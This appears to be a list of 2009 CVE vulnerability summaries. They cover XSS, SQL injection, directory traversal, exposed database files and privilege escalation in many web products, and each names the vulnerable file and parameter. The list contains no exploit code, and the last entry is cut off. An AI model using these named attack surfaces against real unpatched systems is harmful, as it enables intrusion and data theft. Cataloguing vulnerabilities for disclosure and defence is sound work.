Data Loss Prevention (DLP) 3.x before 3.0.100.10 and 9.x before 9.0.0.422, when HTTP Capture mode is enabled, allows local users to obtain sensitive information from web traffic by reading unspecified files. [CVE-2009-5114] Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. [CVE-2009-5113] Cross-site scripting (XSS) vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the DOC parameter. [CVE-2009-5112] wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to obtain the installation path via a crafted request. [CVE-2009-5111] GoAhead WebServer allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris. [CVE-2009-5103] Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable. [CVE-2009-5101] Pentaho BI Server 1.7.0.1062 and earlier includes the session ID (JSESSIONID) in the URL, which allows attackers to obtain it from session history, referer headers, or sniffing of web traffic. [CVE-2009-5100] Pentaho BI Server 1.7.0.1062 and earlier does not set the autocomplete tag to off on web pages using a password field, which might allow physically proximate attackers to obtain the password. [CVE-2009-5099] Cross-site scripting (XSS) vulnerability in ViewAction in Pentaho BI Server 1.7.0.1062 and earlier allows remote attackers to inject arbitrary web script or HTML via the outputType parameter. [CVE-2009-5098] The LunaSysMgr process in Palm Pre WebOS 1.1 and earlier, when not viewing web pages in landscape mode, allows remote attackers to cause a denial of service (crash) via a web page containing a long string following a refresh tag, which triggers a floating point exception. [CVE-2009-5097] Palm Pre WebOS 1.1 and earlier processes JavaScript in email messages, which allows remote attackers to execute arbitrary JavaScript, as demonstrated by reading PalmDatabase.db3. [CVE-2009-5096] Cross-site scripting (XSS) vulnerability in the Flag Content module 5.x-2.x before 5.x-2.10 for Drupal allows remote attackers to inject arbitrary web script or HTML via the Reason parameter. [CVE-2009-5086] Cross-site scripting (XSS) vulnerability in Appliance Configuration Manager (ACM) in Juniper IDP 4.1 before 4.1r3 and 4.2 before 4.2r1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-5071] Unspecified vulnerability in Palm Pre WebOS before 1.2.1 has unknown impact and attack vectors related to an "included contact template file." [CVE-2009-5067] Directory traversal vulnerability in html2ps before 1.0b6 allows remote attackers to read arbitrary files via a .. (dot dot) in the "include file" SSI directive. NOTE: this issue only might be a vulnerability in limited scenarios, such as if html2ps is invoked by a web application, or if a user-assisted attacker provides filenames whose contents could cause a denial of service, such as certain devices. [CVE-2009-5065] Cross-site scripting (XSS) vulnerability in feedparser.py in Universal Feed Parser (aka feedparser or python-feedparser) before 5.0 allows remote attackers to inject arbitrary web script or HTML via vectors involving nested CDATA stanzas. [CVE-2009-5020] Open redirect vulnerability in awredir.pl in AWStats before 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2009-5019] Web Wiz NewsPad stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/NewsPad.mdb. [CVE-2009-5000] Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 4.0.2.x before 4.0.2.3-P8AE-FP003 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to .jsp pages. [CVE-2009-4999] Cross-site scripting (XSS) vulnerability in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-016 allows remote attackers to inject arbitrary web script or HTML via the Name field. [CVE-2009-4995] Cross-site scripting (XSS) vulnerability in frmTickets.aspx in SmarterTools SmarterTrack before 4.0.3504 allows remote attackers to inject arbitrary web script or HTML via the email address field. NOTE: the provenance of this information is unknown [CVE-2009-4994] Cross-site scripting (XSS) vulnerability in frmKBSearch.aspx in SmarterTools SmarterTrack before 4.0.3504 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2009-4991] Cross-site scripting (XSS) vulnerability in users/resume_register.php in Omnistar Recruiting allows remote attackers to inject arbitrary web script or HTML via the job2 parameter. [CVE-2009-4990] Cross-site scripting (XSS) vulnerability in the Webform report module 5.x and 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via a submission. [CVE-2009-4989] Cross-site scripting (XSS) vulnerability in index.php in AJ Auction Pro OOPD 3.0 allows remote attackers to inject arbitrary web script or HTML via the txtkeyword parameter in a search action. [CVE-2009-4984] Multiple cross-site scripting (XSS) vulnerabilities in Accessories Me PHP Affiliate Script 1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Keywords parameter to search.php and (2) SearchIndex parameter to browse.php. [CVE-2009-4983] Multiple cross-site scripting (XSS) vulnerabilities in Silurus Classifieds 1.0 allow remote attackers to inject arbitrary web script or HTML via the ID parameter to (1) category.php and (2) wcategory.php, and the (3) keywords parameter to search.php. [CVE-2009-4980] Multiple cross-site scripting (XSS) vulnerabilities in Photokorn Gallery 1.81 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) where[] parameter to search.php and (2) qc parameter to admin.php. [CVE-2009-4976] Cross-site scripting (XSS) vulnerability in webkitpart.cpp in kwebkitpart allows remote attackers to inject arbitrary web script or HTML via a URL associated with a nonexistent domain name, related to a "universal XSS" issue, a similar vulnerability to CVE-2010-2536. [CVE-2009-4975] Cross-site scripting (XSS) vulnerability in webview.cpp in QtDemoBrowser allows remote attackers to inject arbitrary web script or HTML via a URL associated with a nonexistent domain name, related to a "universal XSS" issue, a similar vulnerability to CVE-2010-2536. [CVE-2009-4972] Cross-site scripting (XSS) vulnerability in index.php (aka the log in page) in SimpleID before 0.6.5 allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2009-4963] Cross-site scripting (XSS) vulnerability in the Commerce extension before 0.9.9 for TYPO3 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4956] Cross-site scripting (XSS) vulnerability in the Visitor Tracking (ws_stats) extension before 0.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4953] Cross-site scripting (XSS) vulnerability in the Userdata Create/Edit (sg_userdata) extension before 0.91.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4948] Cross-site scripting (XSS) vulnerability in the Store Locator extension before 1.2.8 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4944] Multiple cross-site scripting (XSS) vulnerabilities in ATRC ACollab 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) address parameter to profile.php or the (2) description parameter to events/add_event.php. NOTE: the provenance of this information is unknown [CVE-2009-4941] Cross-site scripting (XSS) vulnerability in sign_in.php in ATRC ACollab 1.2 allows remote attackers to inject arbitrary web script or HTML via the f parameter. [CVE-2009-4939] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AdPeeps 8.5d1 allow remote attackers to inject arbitrary web script or HTML via the (1) uid parameter, (2) uid parameter in a login_lookup action, (3) uid parameter in an adminlogin action, (4) campaignid parameter in a createcampaign action, (5) type parameter in a view_account_stats action, (6) period parameter in a view_account_stats action, (7) uid parameter in a view_adrates action, (8) accname parameter in an account_confirmation action, (9) loginpass parameter in an account_confirmation action, (10) e9 parameter in a setup_account action, (11) from parameter in an email_advertisers action, (12) message parameter in an email_advertisers action, (13) idno parameter in an edit_ad_package action, (14) Advertiser Name field, (15) First Name field, (16) Last Name field, (17) Address field, (18) Phone Number field, (19) Password Hint field, or (20) URL field [CVE-2009-4937] Cross-site scripting (XSS) vulnerability in Small Pirate (SPirate) 2.1 allows remote attackers to inject arbitrary web script or HTML via an onmouseover action in an img BBCode tag within a url BBCode tag. [CVE-2009-4934] Cross-site scripting (XSS) vulnerability in index.php in Online Photo Pro 2.0 allows remote attackers to inject arbitrary web script or HTML via the section parameter. [CVE-2009-4933] Multiple SQL injection vulnerabilities in login.php in EZ Webitor allow remote attackers to execute arbitrary SQL commands via the (1) txtUserId (Username) and (2) txtPassword (Password) parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-4930] Cross-site scripting (XSS) vulnerability in the twbkwbis.P_SecurityQuestion (aka Change Security Question) page in SunGard Banner Student System 7.4 allows remote attackers to inject arbitrary web script or HTML via the New Question field. [CVE-2009-4926] Multiple cross-site scripting (XSS) vulnerabilities in Online Contact Manager (formerly EContact PRO) 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) showGroup parameter to (a) index.php and the (2) id parameter to (b) view.php, (c) email.php, (d) edit.php, and (e) delete.php. [CVE-2009-4910] Cross-site scripting (XSS) vulnerability in the WebVPN portal on Cisco Adaptive Security Appliances (ASA) 5580 series devices with software before 8.1(2) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCsq78418. [CVE-2009-4908] Multiple cross-site scripting (XSS) vulnerabilities in oBlog allow remote attackers to inject arbitrary web script or HTML via the (1) commentName, (2) commentEmail, (3) commentWeb, or (4) commentText parameter to article.php [CVE-2009-4903] Cross-site scripting (XSS) vulnerability in index.php in oBlog allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown [CVE-2009-4894] Multiple cross-site scripting (XSS) vulnerabilities in profile.php in PunBB before 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) password or (2) e-mail. [CVE-2009-4892] SQL injection vulnerability in Content Management System WEBjump! allows remote attackers to execute arbitrary SQL commands via the id parameter to (1) portfolio_genre.php and (2) news_id.php. [CVE-2009-4890] Multiple cross-site scripting (XSS) vulnerabilities in the login application in vBook 4.2.17 allow remote attackers to inject arbitrary web script or HTML via the (1) title and (2) message parameters. [CVE-2009-4888] Cross-site scripting (XSS) vulnerability in poster.php in PHortail 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the (1) pseudo, (2) email, (3) ti, and (4) txt parameters. [CVE-2009-4885] Cross-site scripting (XSS) vulnerability in templates/1/login.php in phpCommunity 2 2.1.8 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2009-4882] Cross-site scripting (XSS) vulnerability in zc/publisher/html.rb in ZoneCheck 2.0.4-13 and 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the ns parameter to zc.cgi. [CVE-2009-4877] Multiple cross-site request forgery (CSRF) vulnerabilities in WebGUI before 7.7.14 allow remote attackers to hijack the authentication of users for unspecified requests via unknown vectors. [CVE-2009-4873] Stack-based buffer overflow in the HTTP server in Rhino Software Serv-U Web Client 9.0.0.5 allows remote attackers to cause a denial of service (server crash) or execute arbitrary code via a long Session cookie. [CVE-2009-4869] Cross-site scripting (XSS) vulnerability in index.php in Nasim Guest Book 1.2 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-4868] Cross-site scripting (XSS) vulnerability in Hitron Soft Answer Me 1.0 allows remote attackers to inject arbitrary web script or HTML via the q_id parameter to the answers script (aka answers.php). NOTE: some of these details are obtained from third party information. [CVE-2009-4866] Cross-site scripting (XSS) vulnerability in search.cgi in Matt's Script Archive (MSA) Simple Search 1.0 allows remote attackers to inject arbitrary web script or HTML via the terms parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-4864] Multiple cross-site scripting (XSS) vulnerabilities in escorts_search.php in I-Escorts Directory Script and Agency Script allow remote attackers to inject arbitrary web script or HTML via the (1) search_name and (2) languages parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-4861] Cross-site scripting (XSS) vulnerability in shownews.php in SupportPRO SupportDesk 3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-4859] Multiple cross-site scripting (XSS) vulnerabilities in Online Work Order Suite (OWOS) Lite Edition 3.10 allow remote attackers to inject arbitrary web script or HTML via the show parameter to (1) default.asp and (2) report.asp, and the (3) go parameter to login.asp. [CVE-2009-4858] Cross-site scripting (XSS) vulnerability in questiondetail.php in Yahoo Answers Clone allows remote attackers to inject arbitrary web script or HTML via the questionid parameter. [CVE-2009-4857] Cross-site scripting (XSS) vulnerability in login.php in PHP Photo Vote 1.3F allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-4856] Cross-site scripting (XSS) vulnerability in subitems.php in PHP Easy Shopping Cart 3.1R allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2009-4853] Multiple cross-site scripting (XSS) vulnerabilities in JumpBox before 1.1.2 for Foswiki Wiki System allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4852] Multiple cross-site scripting (XSS) vulnerabilities in SemanticScuttle before 0.94.1 allow remote attackers to inject arbitrary web script or HTML via the sort parameter to index.php, and other unspecified vectors, a different issue than CVE-2008-6113. NOTE: some of these details are obtained from third party information. [CVE-2009-4848] Multiple cross-site scripting (XSS) vulnerabilities in ToutVirtual VirtualIQ Pro 3.2 build 7882 and 3.5 build 8691 allow remote attackers to inject arbitrary web script or HTML via the (1) userId parameter to tvserver/server/user/setPermissions.jsp, (2) deptName parameter to tvserver/server/user/addDepartment.jsp, (3) ID parameter to tvserver/server/inventory/inventoryTabs.jsp, (4) reportName parameter to tvserver/reports/virtualIQAdminReports.do, or (5) middleName parameter in a save action to tvserver/user/user.do. [CVE-2009-4843] ToutVirtual VirtualIQ Pro before 3.5 build 8691 does not require administrative authentication for JBoss console access, which allows remote attackers to execute arbitrary commands via requests to (1) the JMX Management Console or (2) the Web Console. [CVE-2009-4842] Multiple cross-site scripting (XSS) vulnerabilities in ToutVirtual VirtualIQ Pro 3.5 build 8691 allow remote attackers to inject arbitrary web script or HTML via the (1) addNewDept, (2) deptId, or (3) deptDesc parameter to tvserver/server/user/addDepartment.jsp [CVE-2009-4839] Multiple cross-site scripting (XSS) vulnerabilities in Basic Analysis and Security Engine (BASE), possibly 1.4.4 and earlier, allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) admin/base_roleadmin.php, (2) admin/base_useradmin.php, (3) base_conf_contents.php, (4) base_qry_sqlcalls.php, and (5) base_ag_main.php. [CVE-2009-4837] Multiple cross-site scripting (XSS) vulnerabilities in Basic Analysis and Security Engine (BASE) before 1.4.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) sig[1] parameter to base/base_qry_main.php, or the time[0][1] parameter to (2) base/base_stat_alerts.php or (3) base/base_stat_uaddr.php. NOTE: some of these details are obtained from third party information. [CVE-2009-4829] Cross-site scripting (XSS) vulnerability in the Automated Logout module 6.x-1.x before 6.x-1.7 and 6.x-2.x before 6.x-2.3 for Drupal allows remote authenticated users with administer autologout privileges to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4825] 8pixel.net Blog 4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for App_Data/sb.mdb. [CVE-2009-4824] Unspecified vulnerability in Kolab Webclient before 1.2.0 in Kolab Server before 2.2.3 allows attackers to have an unspecified impact via vectors related to an "image upload form." [CVE-2009-4823] Cross-site scripting (XSS) vulnerability in frontend/x3/files/fileop.html in cPanel 11.0 through 11.24.7 allows remote attackers to inject arbitrary web script or HTML via the fileop parameter. [CVE-2009-4822] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kasseler CMS 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) do, (2) id, and (3) uname parameters. [CVE-2009-4820] Angelo-Emlak 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for veribaze/angelo.mdb. [CVE-2009-4814] Cross-site scripting (XSS) vulnerability in Wolfram Research webMathematica allows remote attackers to inject arbitrary web script or HTML via the URI to the MSP script. [CVE-2009-4813] Cross-site scripting (XSS) vulnerability in myps.php in MyBB (aka MyBulletinBoard) 1.4.10 allows remote attackers to inject arbitrary web script or HTML via the username parameter in a donate action. [CVE-2009-4812] Wolfram Research webMathematica allows remote attackers to obtain sensitive information via a direct request to the MSP script, which reveals the installation path in an error message. [CVE-2009-4809] Directory traversal vulnerability in thumbnail.ghp in Easy File Sharing (EFS) Web Server 4.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the vfolder parameter. [CVE-2009-4804] Cross-site scripting (XSS) vulnerability in the Calendar Base (cal) extension before 1.1.1 for TYPO3, when Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via "search parameters." [CVE-2009-4799] Diskos CMS 6.x stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) artikler_prod.mdb or (2) medlemmer.mdb. [CVE-2009-4788] Multiple open redirect vulnerabilities in Pligg 1.0.2 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the (1) return parameter to pligg/login.php and the (2) HTTP Referer header to user_settings.php. [CVE-2009-4786] Multiple cross-site scripting (XSS) vulnerabilities in Pligg before 1.0.3 allow remote attackers to inject arbitrary web script or HTML via the HTTP Referer header to (1) admin/admin_config.php, (2) admin/admin_modules.php, (3) delete.php, (4) editlink.php, (5) submit.php, (6) submit_groups.php, (7) user_add_remove_links.php, and (8) user_settings.php. [CVE-2009-4782] Multiple cross-site scripting (XSS) vulnerabilities in Theeta CMS, possibly 0.01, allow remote attackers to inject arbitrary web script or HTML via the (1) start, (2) forum, and (3) cat parameters to community/thread.php [CVE-2009-4780] Multiple cross-site scripting (XSS) vulnerabilities in index.php in phpMyFAQ before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter in a sitemap action, (2) the search parameter in a search action, (3) the tagging_id parameter in a search action, (4) the highlight parameter in an artikel action, (5) the artlang parameter in an artikel action, (6) the letter parameter in a sitemap action, (7) the lang parameter in a show action, (8) the cat parameter in a show action, (9) the newslang parameter in a news action, (10) the artlang parameter in a send2friend action, (11) the cat parameter in a send2friend action, (12) the id parameter in a send2friend action, (13) the srclang parameter in a translate action, (14) the id parameter in a translate action, (15) the cat parameter in a translate action, (16) the cat parameter in an add action, or (17) the question parameter in an add action. NOTE: the provenance of this information is unknown [CVE-2009-4772] Unspecified vulnerability in the PayPal Website Payments Standard functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal, when a custom checkout completion message is enabled, allows attackers to obtain sensitive information via unknown vectors. [CVE-2009-4771] The PayPal Website Payments Standard functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal does not properly validate orders, which allows remote attackers to trigger unspecified "duplicate actions" via unknown vectors. [CVE-2009-4767] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Plohni Shoutbox 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) input_name and (2) input_text parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-4766] YP Portal MS-Pro Surumu (aka MS-Pro Portal Scripti) 1.0 and 1.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for galeri/database/db.mdb. [CVE-2009-4765] CNR Hikaye Portal 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/hikaye.mdb. [CVE-2009-4760] Winn ASP Guestbook 1.01 Beta stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for data/guestbook.mdb. [CVE-2009-4746] Cross-site scripting (XSS) vulnerability in index.php in Dreamlevels DreamPoll 3.1 allows remote attackers to inject arbitrary web script or HTML via the recordsPerPage parameter in a poll_default login action. [CVE-2009-4744] Cross-site scripting (XSS) vulnerability in the Contact module in Exponent CMS 0.97-GA20090213 allows remote attackers to inject arbitrary web script or HTML via the email parameter. NOTE: the provenance of this information is unknown [CVE-2009-4743] Multiple cross-site scripting (XSS) vulnerabilities in history-storage.aspx in AfterLogic WebMail Pro 4.7.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) HistoryStorageObjectName and (2) HistoryKey parameters. [CVE-2009-4740] Directory traversal vulnerability in the Webesse E-Card (ws_ecard) extension 1.0.2 and earlier for TYPO3 has unspecified impact and remote attack vectors. [CVE-2009-4736] Cross-site scripting (XSS) vulnerability in search.php in CommonSense CMS 5.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2009-4732] SQL injection vulnerability in tt/index.php in TT Web Site Manager 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the tt_name parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-4729] Multiple cross-site scripting (XSS) vulnerabilities in x10 Adult Media Script 1.7 allow remote attackers to inject arbitrary web script or HTML via the (1) pic_id parameter to includes/video_ad.php, (2) category parameter to linkvideos_listing.php, (3) id parameter to templates/header1.php, and (4) key parameter to video_listing.php. [CVE-2009-4728] SQL injection vulnerability in the administrative interface in Questions Answered 1.3 allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-4721] Multiple SQL injection vulnerabilities in Admin/index.asp in Andrews-Web (A-W) BannerAd 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) User and (2) Password parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-4718] SQL injection vulnerability in visitorduration.php in Gonafish WebStatCaffe allows remote attackers to execute arbitrary SQL commands via the nodayshow parameter. NOTE: the provenance of this information is unknown [CVE-2009-4717] Multiple cross-site scripting (XSS) vulnerabilities in Gonafish WebStatCaffe allow remote attackers to inject arbitrary web script or HTML via the (1) host parameter to stat/host.php, nodayshow parameter to (2) mostvisitpage.php and (3) visitorduration.php in stat/, (4) nopagesmost parameter to stat/mostvisitpagechart.php, and date parameter to (5) pageviewers.php, (6) pageviewerschart.php, and (7) referer.php in stat/. [CVE-2009-4716] Cross-site scripting (XSS) vulnerability in results.php in EDGEPHP EZWebSearch allows remote attackers to inject arbitrary web script or HTML via the language parameter. [CVE-2009-4715] Cross-site scripting (XSS) vulnerability in rates.php in Real Time Currency Exchange allows remote attackers to inject arbitrary web script or HTML via the Amount parameter. [CVE-2009-4714] Cross-site scripting (XSS) vulnerability in the quiz module for XOOPS Celepar allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to cadastro_usuario.php. [CVE-2009-4713] Multiple cross-site scripting (XSS) vulnerabilities in the Qas (aka Quas) module for XOOPS Celepar allow remote attackers to inject arbitrary web script or HTML via (1) the cod_categoria parameter to categoria.php, (2) the opcao parameter to index.php, and the PATH_INFO to (3) categoria.php and (4) index.php. [CVE-2009-4707] Cross-site scripting (XSS) vulnerability in the [Gobernalia] Front End News Submitter (gb_fenewssubmit) extension 0.1.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4706] Cross-site scripting (XSS) vulnerability in the Mailform (mailform) extension before 0.9.24 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4705] Cross-site scripting (XSS) vulnerability in the Twitter Search (twittersearch) extension before 0.1.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4704] Unspecified vulnerability in the Webesse E-Card (ws_ecard) extension 1.0.2 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors. [CVE-2009-4703] SQL injection vulnerability in the Webesse Image Gallery (ws_gallery) extension 1.0.4 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2009-4699] Multiple cross-site scripting (XSS) vulnerabilities in SkaDate Dating allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin/auth.php and (2) file_uploader.php. [CVE-2009-4697] Multiple cross-site scripting (XSS) vulnerabilities in index.php in RadNICS Gold 5 allow remote attackers to inject arbitrary web script or HTML via the (1) order parameter in a ulist action and the (2) fid parameter in a view_forum action. [CVE-2009-4694] Cross-site scripting (XSS) vulnerability in index.php in RadScripts RadLance Gold 7.5 allows remote attackers to inject arbitrary web script or HTML via the fid parameter in a view_forum action. NOTE: the provenance of this information is unknown [CVE-2009-4692] Cross-site scripting (XSS) vulnerability in index.php in RadScripts RadLance Gold 7.5 allows remote attackers to inject arbitrary web script or HTML via the pr parameter in a ulist action. [CVE-2009-4690] Multiple cross-site scripting (XSS) vulnerabilities in YourFreeWorld Programs Rating Script allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) rate.php and (2) postcomments.php. [CVE-2009-4689] SQL injection vulnerability in index.php in PHP Shopping Cart Selling Website Script allows remote attackers to execute arbitrary SQL commands via the cid parameter. [CVE-2009-4688] Multiple cross-site scripting (XSS) vulnerabilities in index.php in PHP Shopping Cart Selling Website Script allow remote attackers to inject arbitrary web script or HTML via the (1) txtkeywords and (2) cid parameters. [CVE-2009-4686] Cross-site scripting (XSS) vulnerability in account.php in phplemon AdQuick 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the red_url parameter. [CVE-2009-4685] Cross-site scripting (XSS) vulnerability in celebrities.php in PHP Scripts Now Astrology allows remote attackers to inject arbitrary web script or HTML via the day parameter. [CVE-2009-4684] Cross-site scripting (XSS) vulnerability in index.php in EZodiak allows remote attackers to inject arbitrary web script or HTML via the sign parameter. [CVE-2009-4682] Cross-site scripting (XSS) vulnerability in vote.php in Good/Bad Vote allows remote attackers to inject arbitrary web script or HTML via the id parameter in a vote action. [CVE-2009-4681] Cross-site scripting (XSS) vulnerability in search.php in phpDirectorySource 1.x allows remote attackers to inject arbitrary web script or HTML via the st parameter. [CVE-2009-4678] Cross-site scripting (XSS) vulnerability in index.php in Winn Guestbook 2.4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-4677] Cross-site scripting (XSS) vulnerability in search.php in phpFK PHP Forum ohne 7.0.4 allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown [CVE-2009-4667] SQL injection vulnerability in form.php in WebMember 1.0 allows remote authenticated users to execute arbitrary SQL commands via the formID parameter. [CVE-2009-4666] Multiple PHP remote file inclusion vulnerabilities in Webradev Download Protect 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[RootPath] parameter to (1) Framework/EmailTemplates.class.php, (2) Customers/PDPEmailReplaceConstants.class.php, and (3) Admin/ResellersManager.class.php in includes/DProtect/. [CVE-2009-4662] Cross-site scripting (XSS) vulnerability in the WebAccess component in Novell GroupWise 7.0 before 7.03 HP4 and 8.0 before 8.0 SP1 allows remote attackers to inject arbitrary web script or HTML via the User.Theme.index parameter. [CVE-2009-4655] The dhost web service in Novell eDirectory 8.8.5 uses a predictable session cookie, which makes it easier for remote attackers to hijack sessions via a modified cookie. [CVE-2009-4651] Multiple cross-site scripting (XSS) vulnerabilities in the Webee Comments (com_webeecomment) component 1.1.1, 1.2, and 2.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) color, (2) img, or (3) url BBCode tags in unspecified vectors. [CVE-2009-4650] SQL injection vulnerability in the Webee Comments (com_webeecomment) component 1.1.1, 1.2, and 2.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the articleId parameter in a default action to index2.php. NOTE: some of these details are obtained from third party information. [CVE-2009-4649] Multiple cross-site scripting (XSS) vulnerabilities in geccBBlite 0.1 allow remote attackers to inject arbitrary web script or HTML via the postatoda parameter to (1) rispondi.php and (2) scrivi.php, which is not properly handled in forum.php. [CVE-2009-4647] Cross-site scripting (XSS) vulnerability in Accellion Secure File Transfer Appliance before 7_0_296 allows remote attackers to inject arbitrary web script or HTML via the username parameter, which is not properly handled when the administrator views audit logs. [CVE-2009-4645] Directory traversal vulnerability in web_client_user_guide.html in Accellion Secure File Transfer Appliance before 8_0_105 allows remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter. [CVE-2009-4642] gnome-screensaver 2.26.1 relies on the gnome-session D-Bus interface to determine session idle time, even when an Xfce desktop such as Xubuntu or Mythbuntu is used, which allows physically proximate attackers to access an unattended workstation on which screen locking had been intended. [CVE-2009-4616] Cross-site scripting (XSS) vulnerability in search.php in MYRE Holiday Rental Manager allows remote attackers to inject arbitrary web script or HTML via the cat_id1 parameter. [CVE-2009-4612] Multiple cross-site scripting (XSS) vulnerabilities in the WebApp JSP Snoop page in Mort Bay Jetty 6.1.x through 6.1.21 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under (1) jspsnoop/, (2) jspsnoop/ERROR/, and (3) jspsnoop/IOException/, and possibly the PATH_INFO to (4) snoop.jsp. [CVE-2009-4611] Mort Bay Jetty 6.x and 7.0.0 writes backtrace data without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator, related to (1) a string value in the Age parameter to the default URI for the Cookie Dump Servlet in test-jetty-webapp/src/main/java/com/acme/CookieDump.java under cookie/, (2) an alphabetic value in the A parameter to jsp/expr.jsp, or (3) an alphabetic value in the Content-Length HTTP header to an arbitrary application. [CVE-2009-4610] Multiple cross-site scripting (XSS) vulnerabilities in Mort Bay Jetty 6.x and 7.0.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to jsp/dump.jsp in the JSP Dump feature, or the (2) Name or (3) Value parameter to the default URI for the Session Dump Servlet under session/. [CVE-2009-4608] Cross-site scripting (XSS) vulnerability in Canon IT Solutions Inc. ACCESSGUARDIAN 3.0.14 and earlier, and 3.5.6 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to authentication. [CVE-2009-4607] The command line interface in Overland Storage Snap Server 410 with GuardianOS 5.1.041 runs the "less" utility with a higher-privileged uid than the CLI user and without sufficient restriction on shell escapes, which allows local users to gain privileges using the "!" character within less to access a privileged shell. [CVE-2009-4606] South River Technologies WebDrive 9.02 build 2232 installs the WebDrive Service without a security descriptor, which allows local users to (1) stop the service via the stop command, (2) execute arbitrary commands as SYSTEM by using the config command to modify the binPath variable, or (3) restart the service via the start command. [CVE-2009-4603] Unspecified vulnerability in sapstartsrv.exe in the SAP Kernel 6.40, 7.00, 7.01, 7.10, 7.11, and 7.20, as used in SAP NetWeaver 7.x and SAP Web Application Server 6.x and 7.x, 